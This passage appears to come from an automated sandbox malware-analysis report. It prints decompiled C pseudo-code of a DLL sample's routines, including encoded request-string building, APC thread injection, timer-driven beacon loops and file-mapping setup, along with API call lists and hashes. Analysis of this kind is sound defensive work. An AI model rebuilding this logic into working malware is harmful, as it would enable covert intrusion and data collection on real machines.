                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,005F1AA6,00000002,00000000,?,?,00000000,?,?,005F1AA6,00000002), ref: 005F10E7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: SectionView
                                          • String ID:
                                          • API String ID: 1323581903-0
                                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                          • Instruction ID: bb02ecbb7f4678283118c8a6b0c316bea3d9c0848fb7b7190302679ddacbd0dc
                                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                          • Instruction Fuzzy Hash: 00F012B590060DFFDB119FA5CC89CAFBBBDEB44394B104939B252E1090DA309E489A60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E00C71754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                          				void* _v8;
                                          				signed int _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				void* _v24;
                                          				void* _v28;
                                          				void* __ebx;
                                          				void* __edi;
                                          				long _t60;
                                          				intOrPtr _t61;
                                          				intOrPtr _t62;
                                          				intOrPtr _t63;
                                          				intOrPtr _t64;
                                          				intOrPtr _t65;
                                          				void* _t68;
                                          				intOrPtr _t69;
                                          				int _t72;
                                          				void* _t73;
                                          				void* _t74;
                                          				void* _t76;
                                          				void* _t79;
                                          				intOrPtr _t83;
                                          				intOrPtr _t87;
                                          				intOrPtr* _t89;
                                          				intOrPtr _t95;
                                          				void* _t97;
                                          				intOrPtr _t104;
                                          				signed int _t108;
                                          				char** _t110;
                                          				int _t113;
                                          				signed int _t115;
                                          				intOrPtr* _t116;
                                          				intOrPtr* _t118;
                                          				intOrPtr* _t120;
                                          				intOrPtr* _t122;
                                          				intOrPtr _t125;
                                          				intOrPtr _t130;
                                          				int _t134;
                                          				CHAR* _t136;
                                          				intOrPtr _t137;
                                          				void* _t138;
                                          				void* _t147;
                                          				int _t148;
                                          				void* _t149;
                                          				intOrPtr _t150;
                                          				void* _t152;
                                          				long _t156;
                                          				intOrPtr* _t157;
                                          				intOrPtr* _t158;
                                          				intOrPtr* _t161;
                                          				void* _t162;
                                          				void* _t164;
                                          
                                          				_t147 = __edx;
                                          				_t138 = __ecx;
                                          				_t60 = __eax;
                                          				_v12 = 8;
                                          				if(__eax == 0) {
                                          					_t60 = GetTickCount();
                                          				}
                                          				_t61 =  *0xc7d018; // 0x3df0b315
                                          				asm("bswap eax");
                                          				_t62 =  *0xc7d014; // 0x3a87c8cd
                                          				_t136 = _a16;
                                          				asm("bswap eax");
                                          				_t63 =  *0xc7d010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t64 =  *0xc7d00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t65 =  *0xc7d2a4; // 0x24ba5a8
                                          				_t3 = _t65 + 0xc7e633; // 0x74666f73
                                          				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0xc7d02c,  *0xc7d004, _t60);
                                          				_t68 = E00C757AB();
                                          				_t69 =  *0xc7d2a4; // 0x24ba5a8
                                          				_t4 = _t69 + 0xc7e673; // 0x74707526
                                          				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
                                          				_t164 = _t162 + 0x38;
                                          				_t149 = _t148 + _t72; // executed
                                          				_t73 = E00C773E9(_t138); // executed
                                          				_t137 = __imp__;
                                          				_v8 = _t73;
                                          				if(_t73 != 0) {
                                          					_t130 =  *0xc7d2a4; // 0x24ba5a8
                                          					_t7 = _t130 + 0xc7e8cb; // 0x736e6426
                                          					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
                                          					_t164 = _t164 + 0xc;
                                          					_t149 = _t149 + _t134;
                                          					HeapFree( *0xc7d238, 0, _v8);
                                          				}
                                          				_t74 = E00C7614A();
                                          				_v8 = _t74;
                                          				if(_t74 != 0) {
                                          					_t125 =  *0xc7d2a4; // 0x24ba5a8
                                          					_t11 = _t125 + 0xc7e8d3; // 0x6f687726
                                          					wsprintfA(_t149 + _a16, _t11, _t74);
                                          					_t164 = _t164 + 0xc;
                                          					HeapFree( *0xc7d238, 0, _v8);
                                          				}
                                          				_t150 =  *0xc7d324; // 0x31395b0
                                          				_t76 = E00C7757B(0xc7d00a, _t150 + 4);
                                          				_t156 = 0;
                                          				_v20 = _t76;
                                          				if(_t76 == 0) {
                                          					L26:
                                          					RtlFreeHeap( *0xc7d238, _t156, _a16); // executed
                                          					return _v12;
                                          				} else {
                                          					_t79 = RtlAllocateHeap( *0xc7d238, 0, 0x800);
                                          					_v8 = _t79;
                                          					if(_t79 == 0) {
                                          						L25:
                                          						HeapFree( *0xc7d238, _t156, _v20);
                                          						goto L26;
                                          					}
                                          					E00C7749F(GetTickCount());
                                          					_t83 =  *0xc7d324; // 0x31395b0
                                          					__imp__(_t83 + 0x40);
                                          					asm("lock xadd [eax], ecx");
                                          					_t87 =  *0xc7d324; // 0x31395b0
                                          					__imp__(_t87 + 0x40);
                                          					_t89 =  *0xc7d324; // 0x31395b0
                                          					_t152 = E00C74D2C(1, _t147, _a16,  *_t89);
                                          					_v28 = _t152;
                                          					asm("lock xadd [eax], ecx");
                                          					if(_t152 == 0) {
                                          						L24:
                                          						HeapFree( *0xc7d238, _t156, _v8);
                                          						goto L25;
                                          					}
                                          					StrTrimA(_t152, 0xc7c294);
                                          					_t95 =  *0xc7d2a4; // 0x24ba5a8
                                          					_push(_t152);
                                          					_t18 = _t95 + 0xc7e252; // 0x616d692f
                                          					_t97 = E00C79DEF(_t18);
                                          					_v16 = _t97;
                                          					if(_t97 == 0) {
                                          						L23:
                                          						HeapFree( *0xc7d238, _t156, _t152);
                                          						goto L24;
                                          					}
                                          					_t157 = __imp__;
                                          					 *_t157(_t152, _a4);
                                          					 *_t157(_v8, _v20);
                                          					_t158 = __imp__;
                                          					 *_t158(_v8, _v16);
                                          					 *_t158(_v8, _t152);
                                          					_t104 = E00C7A5E9(0, _v8);
                                          					_a4 = _t104;
                                          					if(_t104 == 0) {
                                          						_v12 = 8;
                                          						L21:
                                          						E00C76106();
                                          						L22:
                                          						HeapFree( *0xc7d238, 0, _v16);
                                          						_t156 = 0;
                                          						goto L23;
                                          					}
                                          					_t108 = E00C72F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
                                          					_v12 = _t108;
                                          					if(_t108 == 0) {
                                          						_t161 = _v24;
                                          						_t115 = E00C7A060(_t161, _a4, _a8, _a12); // executed
                                          						_v12 = _t115;
                                          						_t116 =  *((intOrPtr*)(_t161 + 8));
                                          						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                                          						_t118 =  *((intOrPtr*)(_t161 + 8));
                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                          						_t120 =  *((intOrPtr*)(_t161 + 4));
                                          						 *((intOrPtr*)( *_t120 + 8))(_t120);
                                          						_t122 =  *_t161;
                                          						 *((intOrPtr*)( *_t122 + 8))(_t122);
                                          						E00C7147E(_t161);
                                          					}
                                          					if(_v12 != 0x10d2) {
                                          						L16:
                                          						if(_v12 == 0) {
                                          							_t110 = _a8;
                                          							if(_t110 != 0) {
                                          								_t153 =  *_t110;
                                          								_t159 =  *_a12;
                                          								wcstombs( *_t110,  *_t110,  *_a12);
                                          								_t113 = E00C71600(_t153, _t153, _t159 >> 1);
                                          								_t152 = _v28;
                                          								 *_a12 = _t113;
                                          							}
                                          						}
                                          						goto L19;
                                          					} else {
                                          						if(_a8 != 0) {
                                          							L19:
                                          							E00C7147E(_a4);
                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                          								goto L22;
                                          							} else {
                                          								goto L21;
                                          							}
                                          						}
                                          						_v12 = _v12 & 0x00000000;
                                          						goto L16;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00C71768
                                          • wsprintfA.USER32 ref: 00C717B8
                                          • wsprintfA.USER32 ref: 00C717D5
                                          • wsprintfA.USER32 ref: 00C71801
                                          • HeapFree.KERNEL32(00000000,?), ref: 00C71813
                                          • wsprintfA.USER32 ref: 00C71834
                                          • HeapFree.KERNEL32(00000000,?), ref: 00C71844
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00C71872
                                          • GetTickCount.KERNEL32 ref: 00C71883
                                          • RtlEnterCriticalSection.NTDLL(03139570), ref: 00C71897
                                          • RtlLeaveCriticalSection.NTDLL(03139570), ref: 00C718B5
                                            • Part of subcall function 00C74D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00C752FE,?,031395B0), ref: 00C74D57
                                            • Part of subcall function 00C74D2C: lstrlen.KERNEL32(?,?,?,00C752FE,?,031395B0), ref: 00C74D5F
                                            • Part of subcall function 00C74D2C: strcpy.NTDLL ref: 00C74D76
                                            • Part of subcall function 00C74D2C: lstrcat.KERNEL32(00000000,?), ref: 00C74D81
                                            • Part of subcall function 00C74D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00C752FE,?,031395B0), ref: 00C74D9E
                                          • StrTrimA.SHLWAPI(00000000,00C7C294,?,031395B0), ref: 00C718EC
                                            • Part of subcall function 00C79DEF: lstrlen.KERNEL32(?,00000000,00000000,00C75335,616D692F,00000000), ref: 00C79DFB
                                            • Part of subcall function 00C79DEF: lstrlen.KERNEL32(?), ref: 00C79E03
                                            • Part of subcall function 00C79DEF: lstrcpy.KERNEL32(00000000,?), ref: 00C79E1A
                                            • Part of subcall function 00C79DEF: lstrcat.KERNEL32(00000000,?), ref: 00C79E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00C71919
                                          • lstrcpy.KERNEL32(?,?), ref: 00C71921
                                          • lstrcat.KERNEL32(?,?), ref: 00C7192F
                                          • lstrcat.KERNEL32(?,00000000), ref: 00C71935
                                            • Part of subcall function 00C7A5E9: lstrlen.KERNEL32(?,00000000,00C7D330,00000001,00C7937A,00C7D00C,00C7D00C,00000000,00000005,00000000,00000000,?,?,?,00C7207E,?), ref: 00C7A5F2
                                            • Part of subcall function 00C7A5E9: mbstowcs.NTDLL ref: 00C7A619
                                            • Part of subcall function 00C7A5E9: memset.NTDLL ref: 00C7A62B
                                          • wcstombs.NTDLL ref: 00C719C8
                                            • Part of subcall function 00C7A060: SysAllocString.OLEAUT32(?), ref: 00C7A09B
                                            • Part of subcall function 00C7A060: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 00C7A11E
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 00C71A09
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 00C71A15
                                          • HeapFree.KERNEL32(00000000,?,?,031395B0), ref: 00C71A21
                                          • HeapFree.KERNEL32(00000000,?), ref: 00C71A2D
                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 00C71A39
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 603507560-0
                                          • Opcode ID: a70d1d72d259f9ffd283e22dc4bd5073000ccb40243d23141296514a34559029
                                          • Instruction ID: 9793a86cd602b3a2f3c6f41a75d787780a3e4d024e73322267bacf5c8ed21b28
                                          • Opcode Fuzzy Hash: a70d1d72d259f9ffd283e22dc4bd5073000ccb40243d23141296514a34559029
                                          • Instruction Fuzzy Hash: 90910671900109AFCB119FA8DC89BAE7BB9EF48350F158054F90EA7261DB31DD92DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 97 5f11d4-5f11e7 call 5f179c 100 5f11ed 97->100 101 5f1306-5f1308 97->101 102 5f11ee-5f1216 SwitchToThread call 5f1b6f Sleep 100->102 105 5f1218-5f121a 102->105 106 5f1305 105->106 107 5f1220-5f1224 105->107 106->101 108 5f127a-5f129a CreateThread 107->108 109 5f1226-5f1231 call 5f130b 107->109 110 5f129c-5f12b4 QueueUserAPC 108->110 111 5f12f5-5f12f7 GetLastError 108->111 118 5f1274 109->118 119 5f1233-5f1244 GetLongPathNameW 109->119 113 5f12b6-5f12cb GetLastError TerminateThread CloseHandle SetLastError 110->113 114 5f12d1-5f12d3 110->114 116 5f12fa-5f1301 111->116 113->114 114->111 117 5f12d5-5f12e3 WaitForSingleObject 114->117 116->106 120 5f1303 GetLastError 116->120 121 5f12e5-5f12ea GetExitCodeThread 117->121 122 5f12f0-5f12f3 CloseHandle 117->122 118->108 123 5f126a-5f1272 119->123 124 5f1246-5f1257 call 5f1026 119->124 120->106 121->122 122->116 123->108 124->123 127 5f1259-5f1263 GetLongPathNameW call 5f1938 124->127 129 5f1268 127->129 129->108
                                          C-Code - Quality: 85%
                                          			E005F11D4(void* __ecx, void* __edx, void* __edi, long _a4) {
                                          				long _v8;
                                          				void* _v32;
                                          				long _t21;
                                          				long _t23;
                                          				long _t25;
                                          				void* _t26;
                                          				long _t29;
                                          				long _t30;
                                          				long _t34;
                                          				void* _t39;
                                          				intOrPtr _t42;
                                          				void* _t47;
                                          				void* _t52;
                                          				signed int _t55;
                                          				void* _t57;
                                          				intOrPtr* _t58;
                                          
                                          				_t47 = __ecx;
                                          				_t21 = E005F179C();
                                          				_v8 = _t21;
                                          				if(_t21 != 0) {
                                          					return _t21;
                                          				}
                                          				do {
                                          					_t55 = SwitchToThread() + 8;
                                          					_t23 = E005F1B6F(__edi, _t55); // executed
                                          					_v8 = _t23;
                                          					Sleep(0x20 + _t55 * 4); // executed
                                          					_t25 = _v8;
                                          				} while (_t25 == 0xc);
                                          				if(_t25 != 0) {
                                          					L21:
                                          					return _t25;
                                          				}
                                          				_push(__edi);
                                          				if(_a4 != 0) {
                                          					L11:
                                          					_t26 = CreateThread(0, 0, __imp__SleepEx,  *0x5f4140, 0, 0); // executed
                                          					_t57 = _t26;
                                          					if(_t57 == 0) {
                                          						L18:
                                          						_v8 = GetLastError();
                                          						L19:
                                          						_t25 = _v8;
                                          						if(_t25 == 0xffffffff) {
                                          							_t25 = GetLastError();
                                          						}
                                          						goto L21;
                                          					}
                                          					_t29 = QueueUserAPC(E005F16E4, _t57,  &_v32); // executed
                                          					if(_t29 == 0) {
                                          						_t34 = GetLastError();
                                          						_a4 = _t34;
                                          						TerminateThread(_t57, _t34);
                                          						CloseHandle(_t57);
                                          						_t57 = 0;
                                          						SetLastError(_a4);
                                          					}
                                          					if(_t57 == 0) {
                                          						goto L18;
                                          					} else {
                                          						_t30 = WaitForSingleObject(_t57, 0xffffffff);
                                          						_v8 = _t30;
                                          						if(_t30 == 0) {
                                          							GetExitCodeThread(_t57,  &_v8);
                                          						}
                                          						CloseHandle(_t57);
                                          						goto L19;
                                          					}
                                          				}
                                          				if(E005F130B(_t47,  &_a4) != 0) {
                                          					 *0x5f4138 = 0;
                                          					goto L11;
                                          				}
                                          				_t58 = __imp__GetLongPathNameW;
                                          				_t39 =  *_t58(_a4, 0, 0); // executed
                                          				_t52 = _t39;
                                          				if(_t52 == 0) {
                                          					L9:
                                          					 *0x5f4138 = _a4;
                                          					goto L11;
                                          				}
                                          				_t10 = _t52 + 2; // 0x2
                                          				_t42 = E005F1026(_t52 + _t10);
                                          				 *0x5f4138 = _t42;
                                          				if(_t42 == 0) {
                                          					goto L9;
                                          				}
                                          				 *_t58(_a4, _t42, _t52); // executed
                                          				E005F1938(_a4);
                                          				goto L11;
                                          			}




















                                          APIs
                                            • Part of subcall function 005F179C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,005F11E0), ref: 005F17AB
                                            • Part of subcall function 005F179C: GetVersion.KERNEL32(?,005F11E0), ref: 005F17BA
                                            • Part of subcall function 005F179C: GetCurrentProcessId.KERNEL32(?,005F11E0), ref: 005F17D6
                                            • Part of subcall function 005F179C: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,005F11E0), ref: 005F17EF
                                          • SwitchToThread.KERNEL32 ref: 005F11EE
                                            • Part of subcall function 005F1B6F: VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 005F1BC5
                                            • Part of subcall function 005F1B6F: memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,005F11FF,-00000008), ref: 005F1C57
                                            • Part of subcall function 005F1B6F: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 005F1C72
                                          • Sleep.KERNELBASE(00000000,-00000008), ref: 005F120A
                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 005F123E
                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 005F125E
                                          • CreateThread.KERNEL32 ref: 005F128A
                                          • QueueUserAPC.KERNELBASE(005F16E4,00000000,?), ref: 005F12A6
                                          • GetLastError.KERNEL32 ref: 005F12B6
                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 005F12BD
                                          • CloseHandle.KERNEL32(00000000), ref: 005F12C4
                                          • SetLastError.KERNEL32(?), ref: 005F12CB
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 005F12D8
                                          • GetExitCodeThread.KERNEL32(00000000,?), ref: 005F12EA
                                          • CloseHandle.KERNEL32(00000000), ref: 005F12F1
                                          • GetLastError.KERNEL32 ref: 005F12F5
                                          • GetLastError.KERNEL32 ref: 005F1303
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchTerminateUserVersionWaitmemcpy
                                          • String ID:
                                          • API String ID: 3896949738-0
                                          • Opcode ID: 73ae3f1b265303e0a09d3dd145ce4e815f05806366a0c9bad911ed5b14c0b916
                                          • Instruction ID: ab5b8ad78f1ddc4befa915cc0ffbf2c17cdd9400757a20aacc18164cd05155a5
                                          • Opcode Fuzzy Hash: 73ae3f1b265303e0a09d3dd145ce4e815f05806366a0c9bad911ed5b14c0b916
                                          • Instruction Fuzzy Hash: A9315E7590051DFBDB10AFA5DC888BE7EACFA283947104526FA05D3110EB389E45EBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 130 c79b6f-c79ba1 memset CreateWaitableTimerA 131 c79ba7-c79c00 _allmul SetWaitableTimer WaitForMultipleObjects 130->131 132 c79d23-c79d29 GetLastError 130->132 133 c79c06-c79c09 131->133 134 c79c8b-c79c91 131->134 135 c79d2d-c79d37 132->135 136 c79c14 133->136 137 c79c0b call c768cf 133->137 138 c79c92-c79c96 134->138 142 c79c1e 136->142 143 c79c10-c79c12 137->143 140 c79ca6-c79caa 138->140 141 c79c98-c79ca0 HeapFree 138->141 140->138 144 c79cac-c79cb6 CloseHandle 140->144 141->140 145 c79c22-c79c27 142->145 143->136 143->142 144->135 146 c79c3a-c79c68 call c79f11 145->146 147 c79c29-c79c30 145->147 151 c79c6a-c79c75 146->151 152 c79cb8-c79cbd 146->152 147->146 148 c79c32 147->148 148->146 151->145 155 c79c77-c79c87 call c754ac 151->155 153 c79cbf-c79cc5 152->153 154 c79cdc-c79ce4 152->154 153->134 156 c79cc7-c79cda call c76106 153->156 157 c79cea-c79d18 _allmul SetWaitableTimer WaitForMultipleObjects 154->157 155->134 156->157 157->145 161 c79d1e 157->161 161->134
                                          C-Code - Quality: 83%
                                          			E00C79B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				void _v48;
                                          				long _v52;
                                          				struct %anon52 _v60;
                                          				char _v72;
                                          				long _v76;
                                          				void* _v80;
                                          				union _LARGE_INTEGER _v84;
                                          				struct %anon52 _v92;
                                          				void* _v96;
                                          				void* _v100;
                                          				union _LARGE_INTEGER _v104;
                                          				long _v108;
                                          				intOrPtr _v120;
                                          				struct %anon52 _v128;
                                          				struct %anon52 _t46;
                                          				void* _t51;
                                          				long _t53;
                                          				void* _t54;
                                          				struct %anon52 _t60;
                                          				long _t64;
                                          				struct %anon52 _t65;
                                          				void* _t68;
                                          				void* _t72;
                                          				signed int _t73;
                                          				void* _t75;
                                          				void* _t78;
                                          				void** _t82;
                                          				signed int _t86;
                                          				void* _t89;
                                          
                                          				_t75 = __edx;
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                          				_v60 = _t46;
                                          				if(_t46 == 0) {
                                          					_v92.HighPart = GetLastError();
                                          				} else {
                                          					_push(0xffffffff);
                                          					_push(0xff676980);
                                          					_push(0);
                                          					_push( *0xc7d240);
                                          					_v76 = 0;
                                          					_v80 = 0;
                                          					L00C7B088();
                                          					_v84.LowPart = _t46;
                                          					_v80 = _t75;
                                          					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                          					_t51 =  *0xc7d26c; // 0x3e0
                                          					_v76 = _t51;
                                          					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                          					_v108 = _t53;
                                          					if(_t53 == 0) {
                                          						if(_a8 != 0) {
                                          							L4:
                                          							 *0xc7d24c = 5;
                                          						} else {
                                          							_t68 = E00C768CF(); // executed
                                          							if(_t68 != 0) {
                                          								goto L4;
                                          							}
                                          						}
                                          						_v104.LowPart = 0;
                                          						L6:
                                          						L6:
                                          						if(_v104.LowPart == 1 && ( *0xc7d260 & 0x00000001) == 0) {
                                          							_v104.LowPart = 2;
                                          						}
                                          						_t73 = _v104.LowPart;
                                          						_t58 = _t73 << 4;
                                          						_t78 = _t89 + (_t73 << 4) + 0x3c;
                                          						_t74 = _t73 + 1;
                                          						_v92.LowPart = _t73 + 1;
                                          						_t60 = E00C79F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
                                          						_v128.LowPart = _t60;
                                          						if(_t60 != 0) {
                                          							goto L17;
                                          						}
                                          						_t65 = _v92;
                                          						_v104.LowPart = _t65;
                                          						_t97 = _t65 - 3;
                                          						if(_t65 != 3) {
                                          							goto L6;
                                          						} else {
                                          							_v120 = E00C754AC(_t74, _t97,  &_v72, _a4, _a8);
                                          						}
                                          						goto L12;
                                          						L17:
                                          						__eflags = _t60 - 0x10d2;
                                          						if(_t60 != 0x10d2) {
                                          							_push(0xffffffff);
                                          							_push(0xff676980);
                                          							_push(0);
                                          							_push( *0xc7d244);
                                          							goto L21;
                                          						} else {
                                          							__eflags =  *0xc7d248; // 0x0
                                          							if(__eflags == 0) {
                                          								goto L12;
                                          							} else {
                                          								_t60 = E00C76106();
                                          								_push(0xffffffff);
                                          								_push(0xdc3cba00);
                                          								_push(0);
                                          								_push( *0xc7d248);
                                          								L21:
                                          								L00C7B088();
                                          								_v104.LowPart = _t60;
                                          								_v100 = _t78;
                                          								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                                          								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                          								_v128 = _t64;
                                          								__eflags = _t64;
                                          								if(_t64 == 0) {
                                          									goto L6;
                                          								} else {
                                          									goto L12;
                                          								}
                                          							}
                                          						}
                                          						L25:
                                          					}
                                          					L12:
                                          					_t82 =  &_v72;
                                          					_t72 = 3;
                                          					do {
                                          						_t54 =  *_t82;
                                          						if(_t54 != 0) {
                                          							HeapFree( *0xc7d238, 0, _t54);
                                          						}
                                          						_t82 =  &(_t82[4]);
                                          						_t72 = _t72 - 1;
                                          					} while (_t72 != 0);
                                          					CloseHandle(_v80);
                                          				}
                                          				return _v92.HighPart;
                                          				goto L25;
                                          			}

































                                          APIs
                                          • memset.NTDLL ref: 00C79B89
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00C79B95
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00C79BBD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 00C79BDD
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,00C74AC4,?), ref: 00C79BF8
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C74AC4,?,00000000), ref: 00C79CA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C74AC4,?,00000000,?,?), ref: 00C79CB0
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00C79CEA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 00C79D04
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00C79D10
                                            • Part of subcall function 00C768CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03139388,00000000,?,7519F710,00000000,7519F730), ref: 00C7691E
                                            • Part of subcall function 00C768CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,031393C0,?,00000000,30314549,00000014,004F0053,0313937C), ref: 00C769BB
                                            • Part of subcall function 00C768CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00C79C10), ref: 00C769CD
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C74AC4,?,00000000,?,?), ref: 00C79D23
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: 49dac1a730a9457477c39c90dfa647ed46f38039af0c15039734cd650d3d00e4
                                          • Instruction ID: bc5932418189f5e15a783c167d4e1fa8ecb572f385cfb3335b26082bfb144a6a
                                          • Opcode Fuzzy Hash: 49dac1a730a9457477c39c90dfa647ed46f38039af0c15039734cd650d3d00e4
                                          • Instruction Fuzzy Hash: AB515CB1408311AFCB21AF159C44E5FBBE8FF85760F508A1DF8A992161D770CA44CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%


                                          C-Code - Quality: 74%
                                          			E00C71A4E(intOrPtr __edx, void** _a4, void** _a8) {
                                          				intOrPtr _v8;
                                          				struct _FILETIME* _v12;
                                          				short _v56;
                                          				struct _FILETIME* _t12;
                                          				intOrPtr _t13;
                                          				void* _t17;
                                          				void* _t21;
                                          				intOrPtr _t27;
                                          				long _t28;
                                          				void* _t30;
                                          
                                          				_t27 = __edx;
                                          				_t12 =  &_v12;
                                          				GetSystemTimeAsFileTime(_t12);
                                          				_push(0x192);
                                          				_push(0x54d38000);
                                          				_push(_v8);
                                          				_push(_v12);
                                          				L00C7B082();
                                          				_push(_t12);
                                          				_v12 = _t12;
                                          				_t13 =  *0xc7d2a4; // 0x24ba5a8
                                          				_t5 = _t13 + 0xc7e836; // 0x3138dde
                                          				_t6 = _t13 + 0xc7e59c; // 0x530025
                                          				_push(0x16);
                                          				_push( &_v56);
                                          				_v8 = _t27;
                                          				L00C7AD1A();
                                          				_t17 = CreateFileMappingW(0xffffffff, 0xc7d2a8, 4, 0, 0x1000,  &_v56); // executed
                                          				_t30 = _t17;
                                          				if(_t30 == 0) {
                                          					_t28 = GetLastError();
                                          				} else {
                                          					if(GetLastError() == 0xb7) {
                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                          						if(_t21 == 0) {
                                          							_t28 = GetLastError();
                                          							if(_t28 != 0) {
                                          								goto L6;
                                          							}
                                          						} else {
